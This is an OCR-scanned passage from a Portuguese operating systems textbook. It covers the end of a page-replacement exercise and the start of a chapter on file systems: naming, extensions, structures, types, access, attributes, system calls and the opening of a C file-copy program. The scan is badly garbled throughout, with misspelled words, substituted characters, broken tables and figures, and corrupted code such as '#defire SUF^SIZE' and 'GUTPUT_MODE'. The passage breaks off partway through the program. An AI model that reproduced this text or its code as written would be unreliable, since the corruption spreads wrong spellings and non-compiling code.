predsara de unia rot i na que possa gerar u ma ca de i a de 
referenda de pagina baseada em urn modelo estatfctico. 
Esse modele tein N esiados numerados de 0 a N-L repre- 
sentando ca da u ma das referenci as dc pagina possweis, 
c unia probabiiidadc associada com cada estado L rc- 
presemando a chance de quc a proxima referenda seja a 
mesnui pagina. Em outras drcunstancias P a próxima refe¬ 
renda de pagina sera urna das outras paginas com igual 
probabiiidadc. 

(a) Demonstre que a roli na de geraęao de cadeia de ca- 
racteres de referenda de pagina se comporta apro- 
priadamente para algum N com vaior peąueno. 

w Calcule a iaxa de fatia de pagina para um pequcno 
exemplo no qua3 ha um proccsso c um mi mero bxo 
de molduras de pagina, Expliquc por quc o compor- 
ta men to e correto. 

(c) Repita a parte (b) com dois proce ss os com sequencias 
de referenda de pagina independentes e duas vezes 
mais molduras de pagina que na parte (b>* 

(d) Repita a parte (c), mas u san do urna polftica global 
cm vcz dc urna local Alem disso, comparc a taxa 
dc falta dc pagina por proccsso com a do metodo dc 
polftica local. 






Capitulo 


Sistemas de arquivos 


Todas as apiicaęoes predśam armazenar e rccuperar 
informaęao. Enquanto estiver cxecutando, urn processo 
pode armazenar unia ąuantkfade limitada de informaęao 
denim de seu prdprio espaęo de endereęamento, Conuido, 
a capacidade de armazenamenio esta restrita ao tamanho 
do espaęo dc endcrcęamento viriuaL Para algumas aplica- 
ęoes, esse tamanho e adequado r mas, para outras, como 
reservas de passagens aereas, bancos ou sistemas corporati- 
vos, e pcqueno demais. 

Urn segimdc problema em manier a informaęao den- 
tro do espaęo de endereęarnemo do processo 6 que, quali¬ 
do o processo lermina, a informaęao e perdida. Em muitas 
aplicaęoes (por exemplo, bancos de dados), a informaęao 
precisa Ikar retida por setna nas, meses ou ale mesmo para 
sempre. E inaceitavel que a informaęao em uso pelo pro¬ 
cesso desapaieęa quando de e encerrado. Alem disso, a 
informaęao nao deve desaparecer se nma falha no co nipo- 
tador eliminar o processo. 

Urn lerceiro problema e que muitas vezes e necessario 
que multiplos processos tenham acesso a informaęao (ou a 
parte dela) ao mesmo tempo. Se tivermos urna lista idcfóm- 
ca on-line armazenada demro do espaęo de endereęarnemo 
de um determinado processo, somente esse processo pode i a 
ter aeesso a ela, A soluęao para esse problema e tomara prd- 
pria informaęao independente dc qualqucr processo, 

Assim, temos tres reąuisitos essendals para o armaze- 
namento de informaęao por longo prazo: 

!. Deve ser possivel armazenar urna quan.tidade muito 
grandę de informaęao. 

2. A informaęao deve sobreviver ao termino do pro¬ 
cesso quc a usa. 

3. Multiplos processos rem de ser capazes de acessar a 
in forma ca o eon co rre nt ement e. 

Du rante a nos os discos magnelicos foram responsaveis 
pelo armazenamento de mformaędes de longo prazo, Filas 
e discos óticos lambein foram uiiJizados, mas sen desempe- 
nho era bastante inferior, Estudaremos mais sobre discos 
no Capitulo 5, mas f por ora, basta saber quc eies sao se- 
quencias lineares dc blocos dc tamanho fixo quc suportam 
duas opera ęócs: 

I ■ Leia o bloco k. 

2. Escreva no bloco k. 

Na verdade, existem outras operaęoes, mas, em prin- 
cipio, todos os próbie mas relacionados ao armażenamento 


no longo prazo cońseguem ser resolvidos por essas duas 
operaęoes. 

Entretanto, as opera ęoes de leiutra e escrita sao muito 
inconvenientes, cspecialmente em sistemas grandes usados 
por muitas aplicaęoes e, possiyclmcnte, por muitos nsua- 
nos (por exemplo, em um servidor). Nessa situaęao, algu 
mas das pergumas que surgem sao as seguintes; 

1. Como encontrar a Informaęao? 

2. Como impedir (pic um usuario tenha accsso a infor- 
maęoes dc outro usuario? 

3. Como saber quais blocos estao livres? 

Como vimos, assim como o sistema operacional abs- 
trai do conceito de processador para criar a abstraęao de 
um processo e abstrai do conceito de memória Esica para 
oferecer ao processo um espaęo de endereęarnemo (vii- 
tual), e possivcl solucionar este problema com urna nova 
abstraęao: a de arquivo. Jumas, as abstraędes de processos 
(e threads), espaęos de endereęarnemo e arquivos sao os 
concdlos mais importames relacionados aos sistemas ope- 
racionais. Se de falo compreender esses tres conceitos do 
comeęo ao firn, voce estara no caminho ceno para se tornar 
um especialista em sistemas operadonais. 

Arquivos sao unidades lógicas de informaęao erladas 
por processos. Em geral urn disco comern milhares de ar- 
quivos, urn independente do outro. Na verdade, os arquivos 
tambem sao urna espćcic de espaęo de endereęarnemo, mas 
des sao usados para modelar o disco e nao a memória RAM. 

Os processos podem ler os arquivos existentes e criar 
novos, se necessario. A informaęao armazenada em ar- 
quivos deve ser persistente, isto e, nao pode ser afetada 
pela criaęao c pelo termino dc um processo. Um arquivo 
só desaparecera ąuando scu proprictario rcmovc-!o cxpli- 
citamentc. Embora as operaęoes dc Icitura c cscrita sejam 
as mais cormins, existem muitas outras e vamos exarninar 
algumas delas a seguir 

Arquivos sao gerendados pelo sistema operacional. O 
modo como sao esuuturados, nomcados r accssados, usados, 
protegidos c implementados sao um dos prindpais tópicos dc 
um projeto de sistema operacional. De modo geral, essa par¬ 
te do sistema operacional que trata dos arquivos e conhedda 
como sistema de arquivos e e o assunto deste capitulo. 

Do ponto dc vista do usuario, o aspccto mais impor- 
tante de um sistema de arquivos e como dc Ihe parece, 
islo e, o que consliiui um arquivo, como os arquivos sao 
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nomeados e protegidos, quais operaęoes sao permhidas em 
arquivos e assim por dianie. Delalhes sobre se sao usados 
listas encadeadas on mapas de bits para controlar o arma- 
zenamento disponfvd e ąuantos setores ha em um bloco 
lógico sao dc mcnor intcrcssc, contudo sao dc grandę im- 
portancia para os projciistas do sistema dc arquivos. Por 
isso, cstruturamos cste capftulo cm varias scęoes, As duas 
primciras sao rdacionadas a interface do usuario para os 
arquivo$ e para os diretórios, respectivameme. Em seguida, 
vem urna discussao detal ha da sobre como o sistema de ar- 
quivos e implementado e gerendado. Por fim, mostramos 
alguns exemplos de sistemas de arqnivos reais. 



Arquivos 


Nas próximas paginas, es tu darem os os arquivos do 
ponto de vista do usuario, isto e, como des sao usados e 
quais sao suas propriedades. 


_ 4-1.11 Nomeacao de arquivos 

Arquivo c um mccanismo dc abstraęao. Ele ofcrccc 
mcios de armazenar infomiaęoes no disco c dc le-las dc- 
pois, fsso deve ser feito dc um modo quc isole (3 usuario dos 
delalhes sobre como e onde a informaęao esta armazenada 
e como os discos na verdade funrionam. 

Provavelmente a caractenstica mais importantc dc 
qualquer mccanismo dc abstraęao e o modo como os ob- 
jetos sao gerenriados c nomeados: port anto, miriarcmos 
nosso estudo dc sistemas dc arąmyos falando sobre a no- 
meaęao dc arquivos, Quaudo um proccsso cria um arqtu- 
vo, dc da urn norne a esse arquivo. Quando o proccsso 
term i na, o arquivo continua existindo e outros processos 
podem teracesso a de simplesmciile buscandoseu norne, 

As regras exaias para se dar norne a um arquivo va- 
riam dc sistema para sistema, mas todos os sistemas opera¬ 
cionais atuais perm iłem cadeias de caractcrcs (strings) de 
unia ate oito letras como nomes validos dc arquivos. As- 
sim r andna, kandro c re$ina sao possweis nomes dc arqui- 
vos. Freąucntemeiite dfgitos c caractcrcs espedais tambćrn 
sao permu id os, tornando validos nomes como 2, unjentd e 
Fhfimi2.I4. Muitos sistemas de arquivos pcmiitem nomes 
com ta manhos dc ale 255 caractcrcs. 

Alguns sistemas de arquivos distinguem letras maius- 
cli las de minusculas e outros, na o. O LfNIX pertence a pri- 
meira caiegoria; o MS-DOS pertence a segunda. Porta nto, 
um sistema UNIX pode ter tres arquivos distintos chama - 
dos: marin r Maria c MARIA, No MS-DOS, todos esses nomes 
refercm-sc ao mesmo arquim 

Cabe agora um comemario a parte sobre os sistemas de 
arquivos. O Windows 95 e o Windows 98 u sam o sistema 
de arquivos do MS-DOS, denominado FAT-16, e, portanto, 
herdarn muitas de suas propriedades, como a formaęao dos 
nomes dos arquivos. O Windows 98 introduziu algumas 
cxicnsoes a FAT-lć c lcvou a criaęao da FAT-32, mas os 


dois sistemas sao bastame parecidos. Alem disso, o Windows 
NT, o Windows 2000, o Windows XP e o Windows Vista 
ainda suportam o sistema de arquivos FAT, que atualmen¬ 
ie esta muito obsoIcLo. Esses quatro sistemas operacionais 
baseados no NT apresentam um sistema de arquivos nativo 
(o NTFS) que tern propriedades diferentes (como nomes de 
arquivos em Unicode}. Neste capftulo, quando nos referir- 
mos ao MS-DOS on sistemas dc arquivos FAT, estaremos 
falando sobre FAT-lć e FAT-32 da forma como sao usados 
no Windows, a menos que algo diferente seja esp cci fi ca do. 
Discutiremos o sistema de arquivos FAT posteriormenie 
neste mesmo capftulo e o NTFS no Capftulo 11, quando 
examinaremos com delalhes o Windows Vlsta, 

Mnilos sistemas operacionais permitem nomes de ar- 
quivos com duas partes separadas por um ponto, como cm 
pro$x, A parte que segue o ponto e chamada dc extensao 
do arquivo c normalmente iiidica algo sobre o arquivo. 
No MS-DOS, por exemplo, os nomes de arquivos tern de 
um a oito caracteres e mais urna extensao opcional de 
um a tres caracteres* No UNIX, o tamanho da extensao, 
sc houvcr, fica a critćrio do usuario, c um arqntvo pode 
ter atć mesmo duas ou mais extensocs, como em horne- 
page.html.zip, cm que Jurni indica unia pagina da Web cm 
HTML e .zip indica que o arquivo (homeptigeJitntl) foi ctim- 
primido usando o programa zip. Algumas das extensoes de 
arquivos mais comuns c seus significados sao mostrados 
na Tabela 4>L 

Em alguns sistemas (por cxempIo, no UNIX), as cxicn- 
soes de arquivos constituem apenas coiwenęoes c nao sao 
impostas pdo sistema opcracional. Om arquivo cliamodo 
fikJxt pode ser algum lipo de arquivo-lcxto, mas o nonie 
serve mais para lembrar ao proprietario e nao para oferecer 
qualqucr inlormaęao rcal ao computador. Por outro lado, 
um compilador C pode cxigirque osarquivos a serem com- 
pilados terminem com x e, sc isso nao acontecer, pode se 
negar a compila-los. 

Convenęoes como essas sao espedalmente titeis ąuaiido 
o mesmo programa e capaz de lidar com vaiios tipos dife¬ 
rentes de arqulvos. Ao compilador C r por exemplo, pode ser 
fornedda u ma lista com varios arquivos para compila-los c 
liga-los, alguns deles arquivos em C, e outros, arquivos em 
linguagem assembly. A extensao torna-se, entao, essencial 
para o compilador distinguir os arquivos cm C dos arqttivos 
cm linguagem assembly e tambćrn de outros arquivos. 

Por outro lado, o Windows sabe sobre as extcnsóes c 
atribui significado a das. Os usuarios (ou os processos) po¬ 
dem registrar extensóes no sistema opcracional especifica li¬ 
do, para cada unia dclas, qual programa 'possuP aąuda ex- 
tensao. Quando um usuario dica duas vezes em um norne 
de arquivo, o programa airibuido a sua extensao e execu- 
lado Lendo o arquivo como para metro. Por exernplo, dicar 
duas vezes sob rcjik.doc inidalizara a execuęao do Microsoft 
Word tendo o file Joc como scu arquivo inidal dc cdlęao. 
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Exten sao 

Sigmficado 

.bak 

Copia de seguranęa 

.c 

Codigo-fonte de próg rama em C 

■gif 

Imagem no for mato Graphicaf Interchange Format 

,hlp 

Arquivo de aj uda 

.html 

Documento em HTML 

■iP9 

Imagem codifscada segundo padr6es JPEG 

.mp3 

Musica codificada no formato MPEG (camada 3) 

■mpg 

Filme codificado no padrao MPEG 

,0 

Arquivo objęto (gerado por compilador, ainda nao ligado) 

■pdf 

Arquivo no formato PDF [Portable Document File) 

.ps 

Arquivo PostScript 

.tex 

Entrada para o próg ram a de formataęao TEX 

,txt 

Arquivo de texto 

.zip 

Arquivo compactado 


i Tabela 4.1 Aigumas extensoes comuns de arquivos. 

4.1*21 Estrułura de arquivos 

Os arquivos padem ser estru tura dos de varias manei- 
ras. Tres possibilidades comuns sao exibidas na Figura 4.1. 
O arquivo na Figura 4.1 (a) e unia sequenaa desesirmura- 
da de byt es. De fato, o sisiema operadonal nao sabe o que 
o arquivo contem ou simplesmenle nao se interessa por 
isso. Tudo o que cle ve sao byics. Qualquer significado deve 
ser irnposio pelos pr ogra mas cm nivel de tisuario. Tanio o 
Gl\ t IX ąuanto o Windows u ti li za m essa estra legia. 

Ter o sistema operacional tratando arquivos como 
nada rnais que scąuencias de bytes ofercce a ma x im a fle- 
xibilulade. Os programas de usuańos podern por qualquer 
coisa quc ąutiram cm scus arquivos c chama-los do nome 


quc Ihes convier. Os sistemas operacionais nao ajudarn, 
mas tambem nao atrapalham. Para usuarios que queiram 
fazer coisas inconiuns, cssa caracienstica pode ser muito 
imporiame. Todas as versoes do UNIX, do MS-DOS e do 
Windows usam esse modele de arquivo, 

O primeiro passo na estruturaęao e mostrado na Figu¬ 
ra 4J(b). Ncsse modclo, urn arquivo e urna scąuenda dc 
regisiros de tamanho fixo, ca da um com alguma estrutura 
iiuerna. A ideia central de ter um arquivo como urna se- 
quencia de regisiros e que a operaęao de leitura retorna um 
registro e a operaęao de escrila sobrepoe ou anexa um re¬ 
gistro, Como u ma observaęao histórica, vale lembrar que r 
dccadas atras, ąuando o car ta o dc 80 colunas pertu rado era 


1 Byt© 1 Registro 



(a) (b) 


(c) 


i Figura 4,1 Tres tipos da arquivos. (a) Sequencia de bytes. jb) Sequencia de registros. (c) Arvore. 
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o astro, muitos sistemas operacionais tle compmadores tle 
grandę porte baseavam seus sistemas de arquivos em ar- 
quivos formados por registros de 80 caracteres, correspon- 
dentes as imagens dos cartoes. Esses sistemas ta rabem acei- 
tavam arquivos com registros dc 132 caractercs, destinados 
as impressoras dc linha (quc naquelc tempo cram grandes 
impressoras de correntc com 132 cohmas). Os programas 
liam a entrada em imidades de 80 caractercs c cscreviam 
em unidades dc 132 caractercs, embora 52 deles pudessem 
ser espaęos em branco, daro. Me nim m sistema de propó- 
siio geral atual usa esse modelo como sistema primario de 
arquivos, mas cle era muito comurn nos compmadores de 
grandę porte na epoca dos cartoes perfurados de 80 coin- 
nas e das impressoras de 132 caractercs por linha. 

O terceiro lipo de estru tura de arquivo e mostrado na 
Figura 4. 1 (c)* Nessa organiiaęao, um arqutvo e eonstitmdo 
de uma arvore de registros, nao nece ssana menie todos de 
mesmo tamanho, cada um contendo um campo-chave 
em urna posięao fixa no registro. A arvore e ordenada pelo 
campo-chave para que se busque mais rapidamente por 
uma chave espedfica. 

A operaęao basica aqui nao ć obter o 'prebrimo' regis¬ 
tru, embora isso tambem seja posswel mas obter o registru 
com a chave espedfica da. Para o arquivo zoológico da Fi¬ 
gura 4.1 (c), alguem poderia pedir ao sistema que obtivesse 
o registro cuja chave fosse pSnei, por exemplo, sem se im¬ 
port ar com a posięao exata no arquivo. Alem disso, novos 
registros podem ser adicionados ao arquivo, com o siste- 
ma operacional (e na o o usuario) deddindo onde coloca- 
-los. Essc tipo dc arquivo e evidcntemente bem difereme 
dos fluxos dc bytes d esc stru tura dos usados no UN1X c no 
Windows, mas e amplamente aplicado cm compmadores 
de grandę porte ainda usados para alguns processamentos de 
dados comcrciais, 

4.1.31 Tipos de arquivos 

Mu itos sistemas operacionais dao su porte a vanostiposde 
arquivos. UNIX e Windows, porexemplo, apresenlam arqui- 
vos regulares e diretórios. O UN(X tambem teru arquivos 
especiais dc caractercs c dc blocos. Os arquivos regulares 
sao agtEcles que contem mformaęao do usuario. Todos os 
arquivos da Figura 4.1 sao arquivos regulares. Os diretó- 
rras sao arqoivos do sistema que mantem a estruiura do 
sistema dc arquivos. Estudaremos os dirctóiios a seguir. Os 
arquivos especiais de caracteres sao reladonados a en- 
trada/safda e usados para modelar disposilivos dc E/S, como 
terminais, impressoras c redes. Os arquivos especiais de 
blocos sao usados para modelar discos. Nesie capitulo, nos- 
so interesse sera prinripalmcntc pelos arquivos regulares* 

Arquivos regulares sao, cm geral, ou arquivos ASCII 
ou arquivos binanos. Os arquivos ASCII sao consiitmdos 
dc linhas dc tcxlo. Em alguns sistemas, cada linha termina 
com um caractcrc dc retorno de carro (airrmje return). Em 
omros, c usado o caractcrc prdxima linha (linefeed). Alguns 


sistemas (por exemplo, MS-DOS) usam ambos. As linhas 
nao sao necessariamente todas do mesmo tamanho. 

A grandę vantagem dos arquivos ASCII c quc podem 
ser mostrados e impressos como sao e editados com qual- 
quer editor de iextos. Alem disso, se varios dos programas 
usam arquivos ASCII para entrada e safda, e fani conectar 
a safda de um próg rama a entrada de um outro, como em 
pipelines do imerpretador de comandos (M). (O uso de pi- 
pelincs entre processos nao e muito fadi, mas a interpre- 
taęao da informaęao certamcnte fi ca mais fadi se hoiwer 
uma convenęao, como ASCII, usada para expressar cssa 
informaęao*) 

Outro tipo de arquivo e o binario, isto e, aquele que 
nao e arquivo ASCII. Rdadonar um arquivo desse tipo em 
uma impressora enusaria a impressao de algo totalmente 
incomprccnsivcl. Esses arqiiivos tern, cm geral, alguma es- 
trutura interna conhecida pelos programas quc os usam. 

Por exemplo r na Figura 4,2(a) vemos um arquivo bi¬ 
nario execmavd simples de urna vcrsao do UN1X* Embo¬ 
ra tecnieamente o arquivo seja uma sequcncia dc bytes, 
o sistema operacional somenre cxecu tara um arquivo sc 
dc tivcr um format o apropriado. O arquivo possui cinco 
partes: cabeęalho, texio, dados, bits de realocaęao c tabela 
de sfmbolos. O cabeęalho comeęa com o cbamado numero 
magico, que idemifica o arquivo como executavel (para 
impedir a execuęao acidental de um arquivo que nao seja 
desse format o). Entao vem o tamanho das varias partes do 
arquivo, o endereęo no qual a execuęao deve inicializar e 
alguns bits dc sinalizaęao* Após o cabeęalho esiao o texto e 
os dados do program a propriamente ditos, quc sao carrcga- 
dos na memória c realocados usando os bits dc realocaęao, 
A tabela de sfmbolos e usada para depuraęao. 

Nosso segundo exemplo de arquivo binario e o repo- 
śitório (archivc), tambem do UNIX* Ele consistc cm unia 
colcęao dc procedimentos dc bibliotcca (módulos) compi- 
lados, mas nao ligados. Cada um deles ć prcfaciado por um 
cabeęalho indicando scu nome, data dc criaęao, propriela- 
rio, código dc protcęao e tamanho. Assim como nos arqui- 
vos executaveis r os cabeęalhos dos módulos sao totalmente 
preenchidos com numeros binarios. Etwiados para a im- 
pressora produziria uma com ple ta eon fu sao. 

Todo sistema operacional deve reconheccr pelo menos 
um lipo dc arquivo: scu próprio arquivo cxecuiavel. Mo 
entanto, alguns fazem mais que simplesmente re eon hece- 
4o. O velho sistema TOPS-20 (do DECsystem 20} fol tao 
longe que verificava qual a data e o horano da criaęao de 
qualqucr arquivo que fosse executar, Dcpois cle localizava 
e verificava se o arquivo-fonte havia sido modificado após 
a criaęao de scu correspondentc binario* Em caso afirmativo, 
clc automaticamcnte rccompilaria a fonte* Em termos dc 
UNIX, ć como sc o programu make eslivesse embutido no 
slicll. As cxicnsocs do arquivo cram obrigatórias para que 
o sistema operacional pudesse identilicar qual programa 
binario correspondia a qual fonte. 
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Nu mero magico 


Cabegaihc 

Tamanho do texto 


Tamanho dos dados 



Tamar ho dos dados nao inidalizados 


Módulo 

objęto 

Tamanho da tabela de simbolos 


Ponto de ertlrada 





Flags 


Cabeęalho 



i Tejcto ; 


Módulo 

objęło 



i Dados r 

& 

Cabeęalho 
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reatocaęao 

L/ 

Móduio 

objęło 

X Tabetade 

simbolos 

i 


Ngme do 
móduio 


Data 


Propnetśrio 


Proieęao 


Tamanho 


(a) 


(b) 


l Figura 4,2 (a) Um arquivo executavel (b) Um arquivo. 


Ter arquivos forte menie Upificados, como no cxcmplo 
anierior, causa próbie mas sen usuario fizer qualquei coisa 
que os projetistas do sistema nao esperam. Considere, por 
exemplo, urn sistema no qual osarquivos de safda tenliam 
exiens6es .dat (arquivos de dados}. Se urn usuario esereve 
um progrania forma la doi que le um arquivo x (urn próg ra¬ 
ni a em C), transforma -0 (por exemplo, convenendo-o para 
nm Iayout-padrao de idemaęao), escreve-o em um arquivo 
de safda — um arqmvo Jat — e tenta compilar esse arqui- 
vo usando o compilador C, o sistema se recusara, pois ele 
tera u ma extensao errada. As tenta li vas dc copiar o fik Jat 
para file.c sera o rejeitadas pelo sistema e enlendidas como 
invalidas (para protegero usuario contra enganos}, 

Enąuanto para os novatos essc lipo de 'a miga bil i da de' a o 
usuario e mil, para os usuarios experiemes, e um obstaculo 
que terao de sc csforęar cortsideravdm eiite para sc sobrepor a o 
que o sistema operacional considera razoavel ou nao se fazer. 

4.1.41 Acesso aos arquivos 

Os primeiros sistemas opera ci on ais f orne dam so men¬ 
ie um lipo dc acesso aos arquivos: o acesso sequencial. 
Nesses sistemas, um processo poderia ler todos os bytes ou 
registros em um arqiuvo, partindo do infrio, mas mmca 
salta udo e lendo fora de ordem. Contudo, arqirivos seąuen- 


ciais poderiam voltar ao porno dc pariida e, ponaiiio, ser 
lidos ąuanlas vezes fossem necessarias. Arquivos scquen- 
ciais erani convenienies ąuando o meto de armazenamen- 
io era a fila mag net i ca em vez do disco, 

Quando os discos comeęararn a ser u sad os para arma- 
zenar arquivos, lornou-se possivei ler bytes ou registros dc 
um arquivo fora da orderu em que apareciam no disco ou r 
entao, ler acesso aos regisiros pcla chave em vcz de pcla 
posięao. Arquivos cujos bytes ou registros possani ser lidos 
em qua!quer ordcm sao chamados dc arquivos de acesso 
aleatório, necessarios para muilas aplicaęoes. 

Arquivos de acesso alealório sao essenciais em apli- 
caędes como, por cxemplo, sistemas de ban cos de dados. 
Se um diente de urna companliia acrca liga e quer reservar 
um lugar em um deicnninado voo, o progrania de rcscrvas 
deve ter acesso ao regislro do voo sem ler de ler ant es os 
registros de milliares dc outros voos* 

Dois meiodos podcm ser usados para espcćficar a par- 
tir cle onde a lei tura comeęa. No primciro, loda operaęao 
read indica a posięao do arquivo em que se inicializa a lei- 
tura. No s egu udo, uma operaęao espedal, seek, e fornecida 
para estabclccer a posięao atual. Dcpois de um seek, o ar- 
quivo pode ser lido sequencialmeme a partir de sua posięao 
atual. O ultimo metodo e usado no UN1X e no Windows, 
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4.1-51 Atributos de arquivos 

Todo arqiiivo possui um nome c seu$ dados. Alem disso, 
indos os sfetemas opcrarionais associam outras informaęócs 
a cada arqnivG — par cxemplo, a dala c o liorario em que a 
arquivo foi modificado e o lamanho da arquivo. Chamare- 
mos esscs itcns exiras de atributos do arquivo. Algumas 
pessoas os chamam dc metadados, A lisia dc atributos va- 
ria considcravdmcnic dc um sistcma para mitro. A Tabela 
4.2 mostra algumas possibi lida des. Nenhum sistcma exis- 
terać dispóe dc todos csscs atributos, mas cada um ddes 
esia preseute cm algum sistcma. 

Os primeiros ąuatro atributos Sao sobre a proteęao do 
arquivo c informam qucm pode ter accsso a cle c quem 
nao pode. Todos os tipos dc esąuemas sao possiveis — cs- 
tudarcmos algims ddes depois. Em determinados sistemas, 
o usuario devc apresemar u ma senha para ter acesso a um 
arquivo; nesse caso, a senha dcvc ser um dos atributos, 

As flags sao bitsou campos pequenosqtiecontrolajrmu 
habilitam algunia caracienstica mais esperffica, Arquivos 
ocuhos, por cxemplo, nao aparetem na Iistagem de todos 


os arquivos. A flag de arquivamento e um bit que contro- 
la se foi feita on nao urna cópia dc seguranęa do arquivo 
recentememe. O program a que faz cópias dc seguranęa 
desliga esse bit, e o sistcma opera do na 1 liga-o ąuando o 
arquivo far olterado. Desse modo, o próg rama dc backup 
pode determinar quais arquivos precisam ser sa!vos. A 
flag de tempordrio permite que um arquivo seja marcado 
para mnogi o automatica, ąuando o processo que o criou 
ter mina r. 

O lamanho do registro, a posięao da chave e o tama- 
nho dos campoS'diave existem somente cm arquivos eujos 
registros possani ser eon suita dos usando lima diave + El es 
fomecem a informaęao nccessaria para cncomrar as chaves. 

Os varios atributos de momento indicam ąuando o 
arquivo foi criado, ąuando foi a ultima vcz que tivcram 
acesso a cle e ąuando foi modificado pela ultima vez. Es- 
ses campos sao liteis para varios ftns. Por excmplo, um 
arquivo-lamc quc ten ha sido modificado depois da criaęao 
do arquivo-objeto correspondente precisa ser reconipilado. 
Esses campos dao a informaęao necessaria para isso. 


Atributo 

Sigrtrffcado 

Proteęao 

Quem teru acesso ao arquivo e de que modo 

Senha 

Necessidade de senha para acesso ao arquivo 

Criador 

ID do criador do arquivo 

Proprietario 

Proprietario atuai 

Flag de somente leiiura 

0 para leitura/escrita; 1 para somente leitura 

Flag de oculto 

0 para normal; 1 para nao exibir o arquivo 

Flag de sistema 

0 para arquivos normais; 1 para arquivos do sistema 

Flag de arquivamento 

0 para arquivos com backup; 1 para arquivos sem backup 

Flag de ASCII/birario 

0 para arquivos ASCII; 1 para arquivos binarios 

Flag de acesso aleatório 

0 para acesso somente sequencial; 1 para acesso aleatório 

Rag de temporario 

0 para normal; 1 para apagar o arquivo ao sair do processo 

Rag de travamento 

0 para destravados: diferente de 0 para travados 

Tamanho do registro 

Numero de bytes em um registro 

Posięao da chave 

Posięao da chave em cada registro 

Tamanho do campo-chave 

Numero de bytes no campo-chave 

Momento de criaęao 

Data e hora de criaęao do arquivo 

Momento do ultimo acesso 

Data e hora do ultimo acesso do arquivo 

Momento da ultima alteraęao 

Data e hora da ultima modificaęao do arqulvo 

lamanho atuai 

Numero de bytes no arquivo 

Taruanho maximo 

Numero maxtmo de bytes no arquivo 


I Tabela 4.2 Alguns atributos posstveis de arquń/os. 
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Ha ainda o campo destinado ao tamanho atual do ar- 
quivo* Algims sistemas operaeionais dc compuiadores de 
grandę porte antigos exigiam que sc espedficasse o tama¬ 
nho maxlmo do arquivo ąuatido cle fossc criado, para re 
serva r a quantidadc maxima de me mona a mes dc qual- 
qucr operaęao. Os sistemas operaeionais de estaęóes de 
irabalho e de compuiadores pessoais sao suficientemente 
intdigcntes para nao neecssitarcm dcsse atribulo. 

4.1.61 OperaęÓes com arquivos 

Os arquivos servem para armazenar informaęao e per- 
milir quc cla scja recuperada depois, Sistemas diferentcs 
ofcreccm difcrentcs operaęocs para armazenar c rccuperar 
inforniaęoes. A seguir, nma discussao sobrc as chamadas dc 
sistema mais eomuns relackmadas aos arquivos. 

1. Create. O arquivo e er lado sem dados. A finał ida de 
dessa chamada e anundar qtie o arquivo existe e 
dcfinir alguns dc sens atribulos, 

2. Delete. Quando o arquivo nao e mais necessario, ele 
deve ser removido para liberar o cspaęo em disco 
que ele ocupa. Ha sempre urna chamada de sistenia 
para esse firn. 

3. Opern Antes de usar um arqnivo, um processo deve 
abri-la 0 propósito da chamada open e permitir que 
o sistenia busque e coloquc na memória prindpal os 
atributos c a lista de cndereęos do disco, para tomar 
mais rap ido o aoeśso das chamadas posieriores. 

4. Cio$G, Quando todos os acessos terminam, os atri- 
butos e os endereęos do disco nao sao mais neces- 
sarios, portamo o arquivo dcve ser fechado para 
iiberar espaęo na tabela interna. Muitos sistemas 
estimulam isso impondo um nu mero maximo de 
arquivos abertos por processo, Um disco c csciito 
em blocos, c o fechamenlo de um arquivo foręa a 
escrita do ultimo bloco do arquivo, niesmo que o 
bloco ainda nao esteja completo. 

5. Read Dados sao lidos do arquivo* NormaImenie, os 
bytes lidos sao os da posięao atual. Quem fez a clia- 
mada dcve especificar a ąuantidadc de dados neces- 
saria c tambem fornccer um buffer para colocar os 
dados, 

6. Write. Os dados sao cscritos no arquivo tambem, 
em geral na posięao auial. Se a posięao atual for o 
finał do arquivo, seu tamanho sofrera um aumen- 
to, Se a posięao atual estiver no meio do arquivo, 
os dados existentes sera o sobrescritos e perdidos 
para sempre. 

7. Append, Essa chamada e unia forma rcstrila de write. 
Ela só pode adidonar dados ao finał do arquivo. 
Sistemas quc ofcreccm um conjunto minimo dc 
chamadas de sistenia geral menie nao tein append, 
mas ć comum que os sistemas ofercęam multiplas 


maneiras de fazer a mesma coisa, e esses sistemas, 
algumas vezes, tein a append. 

8. Seek. Para ler acesso akaiório aos arquivos, e ne- 
cessario um metodo para especificar onde estao os 
dados. Urna estrategia comum e urna chamada de 
sistema, seek, que reposiriona o ponteiro de arqutvo 
para um local espedfico do arquivo, Depois que essa 
chamada termina, os dados podcm ser lidos daąucla 
posięao ou escritos nda. 

9. Get attributes. Mu i t as veze s, os processos p red sam 
ler os atributos de um arquivo para continuar a fa¬ 
zer algo. Por exemplo, o programa make do UN1X 
normalnienie e usado para gerenciar os projetos 
de dcsenvolvimento de software, que consistem 
em muitos arquivos-fonie. Quando cha ma do, o 
make vcrifica os moment os de alteraęao de todos 
os arquivDS-fonte e arquivos-objęto. Entao o make 
organiza um nu mero minimo dc compilaęoes nc- 
eessariaspara que se possa atualizar tudo. Para fazer 
isso, o make deve verificar os atributos, mais especE 
ficamente os momemos de alteraęao. 

10, Set attributes, Alguns atributos podcm ser alterados 
pelos usuarios e isso pode ser kito depois da cria- 
ęao do aiquivo. Essa chamada de sistenia serve para 
isso. A informaęao sobre o modo de proteęao e um 
exemplo óbvio. A maioria das flags tambem pode 
ser alterada por meio dessa chamada. 

11. Rename. £ frequente o usuirio precisar alterar o 
nomc de um arquivo exisieme. Essa chamada de 
sistema serve para isso. Ela nao e estritamenie ne- 
cessaria, pois o arquivo poderia ser copiado para um 
novo arquivo com um novo nonie, e o arquivo an- 
terior seria, entao, removido, 

4J.7I Exemplo de urn programa com 

chamadas de sistema para arquivos 

Ncsta seęao, esmdaremos um programa UN1X simples 
que copia o conteudo de um arquivo de origem para um 
arquivo de destino, Ele esta rdadonado na Figura 43. O 
programa tern urna fundonalidade minima e nao chega a 
reportar erros, mas da u ma ideia razoavd de como ftmcio- 
nam algumas chamadas de sistema rdacionadasa arquivos, 

O programa, topy fik, pode ser cha mado, por exemplo, 
pela linha de comando 

copyfile abc xyz 

para copiar o arquivo abc para xyz. Se xyz ja existir, sera 
sobrescrito. Do contrario, sera criado. O programa deve ser 
chamado com exatamente dois argunientos e ambos de¬ 
reni ter nomes validos de arqnivos. O primeiro e a fonie; o 
segundo e o arqulvo de salda. 

Os ąuatro comandos itinchtde logo no i meio do progra¬ 
ma geram a indusao tle unia grandę quamidade de definięoes 
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/* Programa que copia arqutvos. Verificaęao e relato de erros e minimo.*/ 


# i ncl ud e <sy s/ty pes. h> 

#irtclLide <fcntl.h> 

#include <stdltb.h> 

#include <unfstd,h> 

int main(int argc, char *argv[]); 

#defire SUF^SIZE 4096 
#define GUTPUT_MODE 0700 

int main{int argc, char *argv[]) 

{ 

int in_.fd, out_fd, rd_count, wt_count; 
char buffer[BUF_SIZE]; 
